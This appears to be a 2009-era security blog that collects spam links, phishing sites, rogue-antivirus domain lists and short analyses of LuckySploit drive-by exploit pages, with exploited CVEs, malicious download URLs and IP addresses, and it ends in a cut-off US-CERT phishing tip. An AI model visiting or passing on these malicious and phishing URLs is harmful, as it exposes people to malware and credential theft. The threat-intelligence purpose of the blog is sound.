Spam ** 30-Oct

Spam links from my inbox

http://www.iqbgwrue.cn

http://www.ipuiubue.cn

http://yozninext.com/

http://www.barafcp.cn

http://www.kulagqz.cn

http://optin.fanbox.com

http://xikugsc.cn

http://www.buwonjv.cn

http://www.sumavys.cn

http://www.iblmbdue.cn

http://yozninext.com

http://www.onzxckea.cn

http://xikugsc.cn/

http://www.qejindj.cn

http://www.yoxufog.cn

http://www.omjpvvea.cn

http://kayupyp.cn

http://www.zilazon.cn

http://kayupyp.cn

http://www.opqzrlea.cn

http://www.ikfysaue.cn

http://www.gubobos.cn

http://www.nuzopeh.cn

http://www.iypjvgue.cn

http://0rj3op.taficpk.cn

http://9kaps.uecawsnr.cn

http://bd00c.toqorcy.cn

http://7e1c1.jehegyc.cn

http://0c77e.ratalcj.cn

http://c503.wiriccq.cn

http://than.wucidxg.cn

http://f8d5.togovys.cn

http://dd005.gocofgr.cn

http://6f8.josayjr.cn

http://6d03bb.mukaktl.cn

http://12cf.nupaqjv.cn

http://6d208.bomavpf.cn

http://invitel.hu/frstcchl/3.html

http://de72.zohorsc.cn

http://0ac39d.zohorsc.cn

Fake Malaysia Maybank Website - Phishing

My reader sent me email regarding their country Malaysia's largest bank Maybank fake websites. She would like to share out with readers who link to here.

Phishing website:

hxxp://sebastianschaper.net/aegabi06/cache/May2u-Service/Maybank2u_com.html

hxxp://tradewindcay.com/images/Internet-Customer/Maybank2u.html

IP Address: 62.140.23.135

Domains sharing same IP address:

*.bierhaus79cent.com

*.days-of-defeat.com

*.direct-headhunter.com

*.direkt-headhunter.com

*.freesurfmag.com

*.geniale-geldquelle.de

*.hardcore-basicwear.com

*.hardcorebasicwear.com

*.papenrode.com

*.rank-records.com

*.ruhoglu.com

*.sanjoes.com

*.smoothlights.com

*.urnatur.com

*.wertholz-handel.com

*.wertholzhandel.com

*.wwwsk-gaming.com

*.xlixi.com

*.ziami-business-marketing.com

alex-treff.com

alwaysdollar.com

architekturverlag.com

b-waren.com

beauty-date.com

bidilicious-records.com

bierhaus79cent.com

bosporos.net

business-language-support.com

chiacanemondo.com

crazypinup.com

das-ginge.com

days-of-defeat.com

deadlyviperassassinationsquad.com

der-naturgarten.com

dineia.com

direct-headhunter.com

direkt-headhunter.com

elbetaler.com

enterprise-buisness.com

excedense.com

feuerloescher-tv.com

fostaclicc.com

freesurfmag.com

friseurmeisterin.com

fruehgeburt.com

geniale-geldquelle.de

hardcore-basicwear.com

hardcorebasicwear.com

hocazade.net

hyde-undead.com

influenzapandemie.com

isotecs.com

just-fx.com

knowledgediscoverer.com

langerle.com

mail.alex-treff.com

mail.bierhaus79cent.com

mail.bosporos.net

mail.crazypinup.com

mail.direct-headhunter.com

mail.direkt-headhunter.com

mail.freesurfmag.com

mail.geniale-geldquelle.de

mail.hardcore-basicwear.com

mail.hocazade.net

mail.mariavit.com

mail.panmental.com

mail.papenrode.com

mail.rank-records.com

mail.relaxdivers.com

mail.relaxdivers.net

mail.ruf-wilhelmshaven.net

mail.ruhoglu.com

mail.sanjoes.com

mail.sebastianschaper.net

mail.smoothlights.com

mail.teamspeak-showtime.de

mail.urnatur.com

mail.wertholz-handel.com

mail.wertholzhandel.com

mail.wwwsk-gaming.com

mail.xlixi.com

mail.ziami-business-marketing.com

mariavit.com

mc-loft.com

mediaontour.com

meseth.com

michael-neefe.com

mysaptuning.com

noal-entertainment.com

o3-bar.com

p201b.user.evanzo-server.de

panmental.com

papenrode.com

peermedien.com

projektblog.com

rank-records.com

reise06.com

relaxdivers.com

ruf-wilhelmshaven.net

ruhoglu.com

schweizer-bauen.com

schweizerbauen.com

sebastianschaper.net

seniorexpertnet.com

sex-stars-nackt.com

showtime.teamspeak-showtime.de

sientec.com

stelmacher.com

tanz-mit.com

teamspeak-showtime.de

textexport.com

the-dark-sun.com

urnatur.com

wertholz-handel.com

wertholzhandel.com

wwwsk-gaming.com

x-citer.com

xlixi.com

ziami-business-marketing.com

zupanet.com

IP Address: 76.163.230.210

Domains sharing same IP address:

*.tradewindcay.com

tradewindcay.com

MSN Messenger Block Checker - Phishing

IP Address: 121.54.174.85

Domains sharing same IP address:

fq4xnx.see-they-blocked-me.com

www.ooo-seems-im-blocked.com

ahem-they-blocked-me.com

cindrella-blocked-me.com

damnn-they-blocked-me.com

did-they-block-you.com

face-blocked-truth.com

find-reason-of-being-blocked.com

finding-who-blocks.com

friends-block-buddies.com

grab-block-status.com

grab-my-block-status.com

have-they-blocked-you.com

heroes-never-block.com

how-come-they-block-me.com

im-fedup-of-being-blocked.com

im-sad-im-blocked.com

ima-checking-block-status.com

jesus-he-blocked-us.com

kephsa.why-do-they-block.com

lame-friends-block-you.com

leme-check-block-status.com

mean-friends-block.com

mjzfx0.why-do-they-block.com

no-damn-way-im-blocked.com

notice-they-blocked-u.com

oh-i-was-blocked.com

omg-they-blocked-me.com

phew-they-blocked-me.com

phewww-seems-i-am-blocked.com

puff-im-blocked.com

pwdgds.grab-my-block-status.com

sad-i-was-blocked.com

tchv9l.find-reason-of-being-blocked.com

they-were-haha.com

ufff-i-was-blocked.com

urr-he-blocked-us.com

weird-i-was-blocked.com

who-let-me-block.com

why-do-they-block.com

why-my-friends-block.com

wooh-im-blocked.com

www.ahem-they-blocked-me.com

www.ahh-im-blocked.com

www.damn-im-blocked.com

www.damnn-they-blocked-me.com

www.did-they-block-you.com

www.duh-i-got-blocked.com

www.face-blocked-truth.com

www.finding-who-blocks.com

www.friends-block-buddies.com

www.grab-my-block-status.com

www.have-they-blocked-you.com

www.hey-you-block-me.com

www.how-come-they-block-me.com

www.im-fedup-of-being-blocked.com

www.im-sad-im-blocked.com

www.ima-checking-block-status.com

www.jealoused-people-block.com

www.jesus-he-blocked-us.com

www.jesus-im-blocked.com

www.lame-friends-block-you.com

www.leme-check-block-status.com

www.let-people-laugh.com

www.let-them-hehe.com

www.mean-friends-block.com

www.my-block-status-check.com

www.my-friends-block-me.com

www.my-mates-blocked-me.com

www.no-damn-way-im-blocked.com

www.notice-they-blocked-u.com

www.oh-i-was-blocked.com

www.ohh-ma-friend-blocked-me.com

www.omg-they-blocked-me.com

www.phew-they-blocked-me.com

www.puff-im-blocked.com

www.query-block-status.com

www.sad-i-was-blocked.com

www.see-they-blocked-me.com

www.they-were-haha.com

www.ufff-i-was-blocked.com

www.urr-he-blocked-us.com

www.weird-i-was-blocked.com

www.who-let-me-block.com

www.why-do-they-block.com

www.why-i-got-blocked.com

www.why-my-friends-block.com

www.wooh-im-blocked.com

www.ooo-seems-im-blocked.com

see-they-blocked-me.com

fq4xnx.see-they-blocked-me.com

Researcher discloses SQL Injection flaw on barackobama.com

Reference: thetechherald.com

Update:

Jascha Franklin-Hodge, CTO at Blue State Digital, responded to our earlier questions with the following.

"As we treat all security issues with the utmost seriousness, we have been working closely with Organizing for America to investigate this alleged SQL injection problem. After careful review, we are confident that the screenshot included in this bug does not contain any data from the barackobama.com site or any other site hosted by Blue State Digital, the DNC, or Organizing for America."

"The screenshot, per the "KeyWord" box, appears to be related to a "Roosevelt University Calendar Events," not a site that is hosted by Blue State Digital, nor connected with barackobama.com. Microsoft Access is not used in any capacity on the barackobama.com site or servers."

This statement only adds a little more weight to our earlier assumption. Unu has apparently accessed a database on the same server that is unrelated to President Obama’s site. We’ve asked Blue State Digital to confirm if this is in fact the case.

If so, we asked why an SQLi from President Obama's site allowed access to the Access database.

The answer given was firm, "There is no SQL injection issue on our servers or those hosting/related to the barackobama.com site. We do not run Microsoft Access anywhere in our organization, nor do we (or DNC/OFA) run or host to any calendar at Roosevelt University."

It was suggeted that we talk to Unu, who made the allegation in the first place. We've done so and if we hear back, we'll update this story again.

Original Article:

Unu, the researcher responsible for several site vulnerability disclosures in the past, says there are SQL Injection (SQLi) flaws on barackobama.com. He said these flaws allowed him to access usernames and passwords used on the President's domain. At the same time, the DNC disagrees with him, saying that the information provided is based on incorrect assertions.

According to the blog post by Unu, an unsecured parameter in President Obama’s personal domain leads to the SQL Injection, allowing access to the database on the server. Interestingly enough, the database accessed in his example was a MS Access database. MS Access is a database format often rejected by developers on massive Web projects.

“We have a table admin. And in this table we can see that the admin passwords are in PLAIN TEXT! The website is big, with many sections, and there are 19 admins. What else we need to get full access on the website? Nothing. After we log in as admins, we can virtually do anything we want with the website: upload PHPShells, redirects, infect pages with Trojan droppers, [and even deface the whole website],” Unu wrote.

Continue...

Spam Computer-Antivirus19.com, 12scanner.com ** 27-Oct-09

IP Address: 85.17.138.27

Domain sharing same IP address:

check-your-iq.ru

age-bio.ru

age-ega.ru

age-info.ru

agebee.ru

ageegle.ru

aggge.ru

b-i-o-v.ru

before-life.ru

beofree.ru

bestage.ru

bio-v.ru

bio-vozrast.ru

bionaft.ru

biovoz.ru

brynetka.ru

dedlife.ru

dub-dubom.ru

former-life.ru

formerlife.ru

hochesh-li.ru

icq-mobila.ru

icq-tel.ru

icqtel.ru

iq-iq.ru

iqste.ru

last-another-life.ru

last-life.ru

lifoon.ru

medical-static-center.ru

neupadi.ru

nokiaicq.ru

offiget.ru

on-liffe.ru

open-life.ru

previous-life.ru

professional-test.ru

qiiiq.ru

russkitrax.ru

some-other-life.ru

soul-in-you.ru

soulinyou.ru

styleicq.ru

superorgazm.ru

svestnik.ru

telicq.ru

test-health.ru

test-medicine.ru

testbio.ru

the-past.ru

theprevious.ru

what-is-your-iq.ru

www.goored.com

www.karaokeplus.info

you-bio.ru

your-bio.ru

your-great-mind.ru

yourbio.ru

IP Address: 85.17.237.5

Domain sharing same IP address:

*.forbookings.com

*.mail.forbookings.com

*.mybetorwager.cn

*.udta.in

39u.ru

3b4.ru

3cw.ru

a3j.ru

a3l.at

a3l.ru

a5f.at

a5g.ru

a5h.ru

a5i.at

a5j.at

a5j.ru

a5l.at

a5m.at

a8d.ru

aamelkov.hobby-site.com

age-age.ru

age-bio.ru

agebee.ru

ageegle.ru

agend.ru

autobestwestern.cn

b5z.ru

b6l.at

b6t.at

b7g.at

b7g.ru

b8o.ru

b9g.ru

beeeo.ru

beeoo.ru

bigtopliteworld.cn

bio-oib.ru

bio-tube.ru

bio-v.ru

biozavr.ru

biozov.ru

bitest.ru

c1z.at

c1z.ru

c5y.at

c7r.at

c8b.ru

c8k.ru

c9u.ru

ce5.ru

ciqx.in

coolnamemart.cn

dub-dubom.ru

f5l.at

f5x.at

f7y.ru

f8a.ru

findbigthinker.cn

forbookings.com

gasa.in

giantnonfat.cn

hugetopnonfat.cn

iletisim.hopto.org

inhouselabel.cn

inother.ru

iq-mozgi.ru

iqdoza.ru

kburmenko.go.dyndns.org

life-before.ru

liteautoexcellent.cn

litefinestdirect.cn

litetopfindguide.cn

liteupyourride.cn

lotante.cn

lotmachinesguide.cn

mail.forbookings.com

nanotopdiscover.cn

nonfathighestlocate.cn

operations.serveftp.com

past-another-life.ru

pornishe.ru

previous-life.ru

professional-test.ru

q0w.ru

q5v.ru

red-wolf.ru

russkitrax.ru

superorgazm.ru

t-age.ru

test-health.ru

the-previous.ru

theanotherlife.ru

u1l.ru

u1x.ru

u3h.ru

u6v.ru

u7e.ru

u8i.ru

udta.in

uppd.in

www.bigtopmanagement.cn

www.finditinbigapple.cn

www.forbookings.com

www.mail.forbookings.com

x0v.ru

x3b.ru

x6i.ru

x7d.ru

x9f.ru

x9u.ru

x9v.ru

x9w.ru

xe6.ru

xh3.ru

xj4.ru

xk9.ru

xv8.ru

yourbio.ru

yourlitetopfind.cn

yournamequickshop.cn

zdlz.in

IP Address: 91.121.24.139

Domains sharing same IP address:

*.a3j.ru

*.a5j.ru

*.a5l.at

*.agebio.ru

*.b3a.ru

*.b5r.ru

*.b6l.at

*.b7p.ru

*.b9g.at

*.beage.ru

*.beo-free.ru

*.bestbeo.ru

*.bi-test.ru

*.bio-free.ru

*.bionaft.ru

*.biovoz.ru

*.c1z.ru

*.c6p.at

*.c7r.at

*.c8k.ru

*.c8t.at

*.ce5.at

*.f5x.at

*.f5x.ru

*.f7g.ru

*.f7y.at

*.last-life.ru

*.soul-in-you.ru

*.uppd.in

*.xj4.ru

*.xv8.ru

*.you-bio.ru

*.youbio.ru

*.your-age.ru

18-plus.ru

39u.ru

3b4.ru

a3j.ru

a3l.at

a3l.ru

a5f.at

a5g.ru

a5j.ru

a5l.at

a5m.at

a8d.ru

agebio.ru

ageee.ru

ageend.ru

ageinf.ru

b5z.ru

b6l.at

b6t.at

b7g.at

b8o.ru

b9g.ru

beage.ru

beeeo.ru

beeoo.ru

bestbeo.ru

bio-free.ru

bio-z.ru

c1z.at

c1z.ru

c5y.at

c7r.at

c8b.ru

c8k.ru

c9u.ru

ce5.ru

cedric-guduff.com

check-your-iq.ru

dima-bilan-gey.ru

f5l.at

f5x.at

f7y.ru

f8a.ru

formerlife.ru

iq-mozgi.ru

iqdoza.ru

ks24667.kimsufi.com

lekiss.net

liteautoexcellent.cn

off-life.ru

past-another-life.ru

pornishe.ru

q5v.ru

roxane-sara.com

roxane-sara.net

roxanesara.com

roxanesara.net

roxyblog.net

sex-finish.ru

sexfinish.ru

soul-in-you.ru

t-age.ru

test-medicine.ru

testoid.ru

thomasmenga.com

tiqt.ru

u1l.ru

uppd.in

www.a3j.ru

www.a3l.ru

www.b3a.ru

www.b6l.at

www.b9g.at

www.bigtopliteworld.cn

www.c6y.at

www.c7r.at

www.c8k.ru

www.dub-dubom.ru

www.litehitscar.cn

www.mymixwager.cn

www.thebettings.cn

xj4.ru

xk9.ru

xv8.ru

your-age.ru

your-great-mind.ru

IP Address: 91.121.167.41

Domains sharing same IP address:

*.a5f.at

*.a5m.ru

*.b5r.at

*.bqtl.in

*.findbigshots.cn

*.nanotopdiscover.cn

*.oaty.in

*.q0a.ru

*.q1k.ru

*.superorgazm.ru

*.u0s.in

*.xb5.ru

*.xc8.ru

18-plus.ru

a5f.ru

a5i.ru

age-t.ru

b5r.at

b6l.ru

bigtopbrands.cn

bigtoprocks.cn

bio-a.ru

c5e.at

c6y.ru

creativeblockplay.cn

f6e.at

f7p.at

f9a.at

filmoflife.cn

findyourbigidea.cn

gasa.in

gianthighest.cn

gzpf.in

hugebestbuys.cn

jumbobestrate.cn

jxsb.in

kbgg.in

ks361128.kimsufi.com

litehighestmodel.cn

litetopdiscoversite.cn

litetopseeksite.cn

lotmachinesguide.cn

martpictureexistence.cn

mediahomenameshopmovie.cn

mixbetonline.cn

mixgrouptravel.cn

namegamestore.cn

namemartfilmlife.cn

ns6.bestlitediscover.cn

playslotbet.cn

powermixplay.cn

q0a.ru

q0i.ru

q0j.ru

q0k.ru

q1k.ru

q3b.ru

q3e.ru

q47.ru

q5a.ru

q5k.ru

rnfs.in

shopfilmlifeonline.cn

shopmoviefestival.cn

shoponlinefilmsite.cn

shopvideocommission.cn

spzr.in

superbetsports.cn

superdietfind.cn

thebestwaytofind.cn

thelitelocate.cn

themixbet.cn

u0b.ru

u0c.ru

u0t.ru

u1m.ru

u1w.ru

u1y.ru

u3w.ru

u3y.ru

u6d.ru

u6k.ru

u6n.ru

u7p.ru

u7x.ru

u8b.ru

u9j.ru

www.a3h.ru

www.a3j.at

www.a3l.at

www.a5f.at

www.a5h.at

www.a5h.ru

www.a5i.at

www.a5j.at

www.a5j.ru

www.a5m.at

www.atxh.in

www.bigpremiumlite.cn

www.bigtopfindsite.cn

www.bqtl.in

www.coolnamemart.cn

www.f5l.ru

www.shopfilmlifescience.cn

www.shopmovielife.cn

www.u0s.in

www.u6l.ru

www.u7f.ru

www.u9a.in

www.x9m.ru

www.yourfilmlife.cn

x6q.ru

x6r.ru

x8b.ru

x8f.ru

x8m.ru

xb5.ru

xg9.ru

xj7.ru

xq0.ru

yourfilmlife.cn

IP Address: 94.75.198.241

Domains sharing same IP address:

*.cmshop.dk

2a.cmshop.dk

911test.ru

age-inf.ru

age-t.ru

bestbio.ru

biersted.net

check-your-iq.ru

cmshop.dk

dima-bilan-gey.ru

grubi.ru

intelq.ru

lifezilla.ru

mail.biersted.net

mail.cmshop.dk

onelifebefore.ru

partnertest.net

pornomig.ru

samsungicq.ru

sex-finish.ru

sexfinish.ru

test-death.ru

testodrome.ru

testoid.ru

testometr.ru

yaiq.ru

IP Address: 89.248.174.58

Domains sharing same IP address:

12scanner.com

allaboutentourage.com

chupachupsorg.com

computer-antivirus19.com

eric-clapton2009.cn

ns2.wempowa.com

the-offspring.cn

Not Active domains:

mycomputerbestscan11.com

mycomputerfastscan11.com

www.my-garden-state.com

iron-mit-wine.com

Advanced Virus Remover with LuckySploit ** hxxp://morning1.cn

SEO poisoning is common trend used to spread rouge av software. Usually, this type of attack coupled with relevant big event key words or related terms. Today, what I found was totally different from common behavior that noticed from different security blogs.

Upon visiting to rouge av, users not more presented with standard fake website and force users to download rouge av software. New method used to install on users system directly without users interaction. Users's system desktop wallpaper will be changed with "YOUR SYSTEM IS INFECTED", and red icon will appear under at icon panel.

What happen behind the scenario was visiting to compromised website will be redirecting to lucklysploits site.

After De-obfuscating

Redirector with hostname "morning1.cn" will redirecting to LuckySploit page that look similar like this.

Obfuscated code

First layer - De-obfuscate

Second layers - De-Obfuscate

CLSIDs found:

- BD96C556-65A3-11D0-983A-00C04FC29E30

- BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014)

- AB9BCEDD-EC7E-47E1-9322-D4A210617116 (MDAC Vulnerability)

- 0006F033-0000-0000-C000-000000000046

- 0006F03A-0000-0000-C000-000000000046

- 6e32070a-766d-4ee6-879c-dc1fa91d2fc3

- 6414512B-B978-451D-A0D8-FCFDF33E833C

- 7F5B7F63-F06F-4331-8A26-339E03C0AE3D

- 06723E09-F4C2-43c8-8358-09FCD1DB0766

- 639F725F-1B2D-4831-A9FD-874847682010

- BA018599-1DB3-44f9-83B4-461454C84BF8

- D0C07D56-7C69-43F1-B4A0-25F5A11FAB19

- E8CCCDDF-CA28-496b-B050-6C07C962476B (CVE-2007-0717)

- 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (CVE 2008-0015)

MS Office Web Components Spreadsheet (OWC10.Spreadsheet Exploit)

Once system detected contain vulnerability, javascript contain with malware download links "Setup.exe" and "go.jpg" will be triggered. The "Setup.exe" currently has detection rate of about 2.44 percent on Virustotal. :(

"go.jpg" currently have detection rate of about 7.32 percent of Virustotal, contains code like below.

And the last was another two malware file "SetupAdvancedVirusRemover.exe" rogue av and "dfghfghgfj.dll" will be download to system. Each of sample gain 48.79% percent and 63.42% percent in Virustotal respectively.

Malicious IP address involved:

- morning1.cn - 91.212.198.152 (Rusia)

- coolcount1.com - 91.207.116.55

- downloadavr7.com- 91.207.116.55

Domains sharing same IP address: 91.212.198.152

morning1.cn

homut1.cn

morning1.cn

scan-your-pc.cn

www.morning1.cn

yt6tyg.cn

Domains sharing same IP address: 91.207.116.55

10-open-davinci.com

advanced-virus-remover-2009.com

advanced-virusremover-2009.com

advanced-virusremover2009.com

advancedvirusremover-2009.com

best-scan-pc.com

best-scanpc.com

best-scanpc.net

best-scanpc.org

cathrynzfunz.com

coolcount1.com

downloadavr6.com

downloadavr7.com

mail.10-open-davinci.com

mail.advanced-virus-remover-2009.com

mail.advanced-virusremover2009.com

mail.best-scan-pc.com

mail.best-scanpc.org

mail.cathrynzfunz.com

mail.coolcount1.com

mail.downloadavr6.com

mail.downloadavr7.com

mail.hard-xxx-tube.com

mail.testavrdown.com

mail.xxx-white-tube.net

testavrdown.com

www.advanced-virus-remover-2009.com

www.advancedvirus-remover2009.com

www.advancedvirusremover-2009.com

www.best-scan-pc.com

www.best-scanpc.net

www.best-scanpc.org

www.hard-xxx-tube.com

www.onlinescanxppro.com

xxx-white-tube.net

Thanks,

--X0end

www.africacareerguidance.com

Africacareerguidance main page.

Source Code:

Download link:

crack_1_.45155.exe (Virustotal 6/41)

crack_2_.45155.exe (Virustotal 6/41)

jeanietomanek.com compromised to host luckysploit

My reader sent my email regarding that "jeanietomanek.com" was compromised to host multiple exploits code and contain link redirecting to another exploits side also.

_vti_bin/nav_links.php

First layer - De-obfuscated code "nav_links.php"

Second layer- De-obfuscated code "nav_links.php"

From second layer de-obfuscated, there have few URL links:

- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKYK

- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKYK (DirectShow 0Day)

-http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKe (QuickTime)

- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKjK

- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKWS (PDF Exploit) VirusTotal (4/41)

Analyst standalone malicious PDF will end with nothing, because there have separate function that visible after second-layer de-obfuscated. It will make analysis work harder. Vulnerable Adobe PDF will crashed when open the PDF file, and it will downloading malware to system that detected by most of Anti-Virus (Virustotal 38/41)

From the second layer, obviously this code launched multiple exploits in one page. And it seem exploiting is not enough until it redirecting to "tapiroten.info"

-tapiroten.info/lin.cgi?jzo

-tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKKgYluSiFWKeKRWlclXuKYlYcYWieSZZKYeFeRYlSFSjKKKKKKKKKK

-tapiroten.info//lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKYK0 (exe) VirusTotal (23/41)

-tapiroten.info/lin.cgi?jzo

De-obfuscated code:

CLSID found:

- BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014)

- 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (CVE 2008-0015)

- 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B (CVE-2007-0717)

- FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6 (CVE-2007-6250)

- AB9BCEDD-EC7E-47E1-9322-D4A210617116 (MDAC Vulnerability)

- BD96C556-65A3-11D0-983A-00C04FC29E3o

- BD96C556-65A3-11D0-983A-00C04FC29E36

- 0006F033-0000-0000-C000-000000000046

- 0006F03A-0000-0000-C000-000000000046

- 6e32070a-766d-4ee6-879c-dc1fa91d2fc3

- 6414512B-B978-451D-A0D8-FCFDF33E833C

- 7F5B7F63-F06F-4331-8A26-339E03C0AE3D

- 06723E09-F4C2-43c8-8358-09FCD1DB0766

- 639F725F-1B2D-4831-A9FD-874847682010

- BA018599-1DB3-44f9-83B4-461454C84BF8

- D0C07D56-7C69-43F1-B4A0-25F5A11FAB19

- E8CCCDDF-CA28-496b-B050-6C07C962476B

- 527196a4-b1a3-4647-931d-37ba5af23037 (CVE-2006-0003)

- d27cdb6e-ae6d-11cf-96b8-444553540000 (CVE-2006-0003)

Malicious IP address involved:

- jeanietomanek.com - 216.39.57.106

- tapiroten.info - 216.150.79.76

- 216.155.153.212

- 174.139.241.2

- 209.31.180.144

Domains sharing same IP address: 216.150.79.76

cacorq.info

clxhbz.info

dgrxqh.info

diwiowano.info

dmdurz.info

ftp.centod.com

funkol.info

geetol.info

gitoer.info

gutrandin.info

hizfek.info

hopore.info

ivgzda.info

jopqae.info

kolpao.info

nadotraza.info

ns.centod.com

ns2.centod.com

ofahitino.info

oirjsa.info

ornotivec.info

pirtaf.info

pop.centod.com

popsto.info

qxfcuc.info

rellok.info

ruhcsy.info

sacmtf.info

sdoras.info

tapiroten.info

tiizwb.info

traxemere.info

tuerog.info

ulmqmq.info

vivibt.info

www.cacorq.info

www.centod.com

www.clxhbz.info

www.dmdurz.info

www.geetol.info

www.gitoer.info

www.hizfek.info

www.hopore.info

www.jimlkn.info

www.jopqae.info

www.kolpao.info

www.niraynome.info

www.oirjsa.info

www.pirtaf.info

www.popsto.info

www.qxfcuc.info

www.rellok.info

www.ruhcsy.info

www.sdoras.info

www.tapiroten.info

www.tiizwb.info

www.tuerog.info

www.vivibt.info

www.yyoqny.info

xsxydj.info

yuncdjbiw.info

yyoqny.info

Sigh...it really make me tire to analysis this malicious link. The efforts are become harder and harder when evade techniques are improved lots. While Anti-virus have cloud-security computing, and hacker/bad guys have cloud-antisecurity computing.

--X0end

Remove Spyware Protect From Your PC -- Rouge Antivirus

Remove.Total.Security.com

IP Address: 208.73.210.27

spywareprotect2009.com

3798283.com

aafsco.com

absoluteinc.com

alahdadibrick.com

alexstram.com

auditrack.com

azais.net

bait-zion.com

bankvisalia.com

billmonroefoundation.com

bodyextreme.com

bookmarkthispage.com

bostonbiomedica.com

brandspecialists.com

breakthebank.ca

brook.absoluteinc.com

celebris.net

cell2pc.com

cityassistedliving.com

clef.ca

connercreekacademy.com

cport.com

customag.com

davidboyce.com

dsredirection.com

e-emco.com

e-tradinghouse.com

espotting.info

evilkey.com

exchange.makery.com

exinder.com

exoticfrogs.com

fazetron.com

ftp.messageserver.com

g-spotting.com

gabber.us

geilestars.com

goodwebsearch.net

gulamcn.com

handlanu.net

harwoodgolf.com

hotdogsrfun.com

inetbusiness.com

inetonline.net

intellogix.net

khorasanibrick.com

live11.com

mail.bodyextreme.com

mail.brandspecialists.com

mail.geilestars.com

mail.gulamcn.com

mail.hotdogsrfun.com

mail.inetonline.net

mail.majorconnection.com

mail.messageserver.com

mail.suesse-maedchen.com

mailhost.brook.absoluteinc.com

majorconnection.com

makery.com

marwan.ca

mcaretail.com

menas.net

messageserver.com

mlbk.com

mmmtech.com

momyu.net

mypeoplecanada.com

nepalink.net

netwebpage.com

nonstopsolution.net

ns.gulamcn.com

ns1.alahdadibrick.com

ns1.bhwy.net

ns1.exinder.com

ns1.khorasanibrick.com

ns2.exinder.com

nyslivingmuseum.org

pajhwak.com

pal9.com

pearlcorporation.com

phukettravelshop.com

pojiejidi.com

precision-resources.com

puredirectory.com

python-hpio.net

racezoneonline.com

ragshop.com

rambos.net

rockparty.com

room41.com

russiancoins.net

salemobiles.com

samlink.com

sleftrade.com

startools.com

suesse-maedchen.com

swedenactiveholidays.com

syndic-faillite-dette.com

tfainc.com

toshibamyconnect.com

vidorpirates.com

wc3modforge.com

wembleyco.com

westernmedia.com

www.agalleria.com

www.auditrack.com

www.bostonbiomedica.com

www.breakthebank.ca

www.chs.md

www.clef.ca

www.e-emco.com

www.e-tradinghouse.com

www.handlanu.net

www.hotdogsrfun.com

www.mlbk.com

www.nyslivingmuseum.org

www.rockparty.com

www.syndic-faillite-dette.com

www.westernmedia.com

wzbt.org

zoneaffiliates.com

IP Address: 174.132.250.194

antivirus360remover.com

av360removaltool.com

mail.malwarebot.org

mail.malwaree.com

mail.malwaree.org

mail.remove-a360.com

mail.remove-antivirus-360.com

mail.remove-antivirus-system-pro.com

mail.remove-antivirusbest.com

mail.remove-av360.com

mail.remove-ie-security.com

mail.remove-malware-defender.com

mail.remove-malware-doctor.com

mail.remove-ms-antispyware.com

mail.remove-personal-antivirus.com

mail.remove-personal-defender.com

mail.remove-spyware-guard.com

mail.remove-spyware-protect-2009.com

mail.remove-spyware-protect.com

mail.remove-system-guard.com

mail.remove-total-security.com

mail.remove-ultra-antivir-2009.com

mail.remove-ultra-antivirus-2009.com

mail.remove-virus-alarm.com

mail.remove-virus-melt.com

mail.remove-winpc-antivirus.com

mail.remove-winpc-defender.com

mail.vundofixtool.com

mail.www-malware.org

malwarebot.org

malwaree.com

malwaree.org

remove-a360.com

remove-antivirus-360.com

remove-antivirus-system-pro.com

remove-antivirusbest.com

remove-av360.com

remove-ie-security.com

remove-malware-defender.com

remove-malware-doctor.com

remove-ms-antispyware.com

remove-personal-antivirus.com

remove-personal-defender.com

remove-spyware-guard.com

remove-spyware-protect-2009.com

remove-spyware-protect.com

remove-system-guard.com

remove-total-security.com

remove-ultra-antivir-2009.com

remove-ultra-antivirus-2009.com

remove-virus-alarm.com

remove-virus-melt.com

remove-winpc-antivirus.com

remove-winpc-defender.com

smitfraudfixtool.com

vundofix.org

vundofixtool.com

www-malware.org

www.av360removaltool.com

www.malwarebot.org

www.malwaree.com

www.malwaree.org

www.remove-a360.com

www.remove-antivirus-360.com

www.remove-av360.com

www.remove-ie-security.com

www.remove-ms-antispyware.com

www.remove-spyware-protect.com

www.remove-system-guard.com

www.remove-total-security.com

www.remove-ultra-antivirus-2009.com

www.remove-virus-alarm.com

www.remove-virus-melt.com

www.vundofixtool.com

Malicious ** 24-Oct, fshanghai.net

fshanghai.net (113.30.107.99)

main.php:

Decoded code:

->http://fshanghai.net/zb/main.php?s=aKbK6jssA&id=2

->http://fshanghai.net/zb/main.php?s=aKbK6jssA&id=3

baramdeco.net

biss.ssz.kr

eyesteal.net

forgogh.net

fshanghai.net

jrsansam.com

linkmoa.net

moonshinsa.com

silveryjoy.net

utaksa.org

332533.com

jeilnaksi.com

sansameo.com

Win Brand New iPhone Scam

Recently, I received an email regarding to win brand new iPhone just through answering simple question. Believe that this is one of the scam and people fall to this kind of spam too.

Avoiding Social Engineering and Phishing Attacks

Reference: US-CERT

Cyber Security Tip ST04-014
Avoiding Social Engineering and Phishing Attacks

Do not give sensitive information to anyone unless you are sure that they
are indeed who they claim to be and that they should have access to the
information.

What is a social engineering attack?

In a social engineering attack, an attacker uses human interaction (social
skills) to obtain or compromise information about an organization or its
computer systems. An attacker may seem unassuming and respectable, possibly
claiming to be a new employee, repair person, or researcher and even
offering credentials to support that identity. However, by asking questions,
he or she may be able to piece together enough information to infiltrate an
organization's network. If an attacker is not able to gather enough
information from one source, he or she may contact another source within the
same organization and rely on the information from the first source to add
to his or her credibility.

What is a phishing attack?

Phishing is a form of social engineering. Phishing attacks use email or
malicious websites to solicit personal information by posing as a
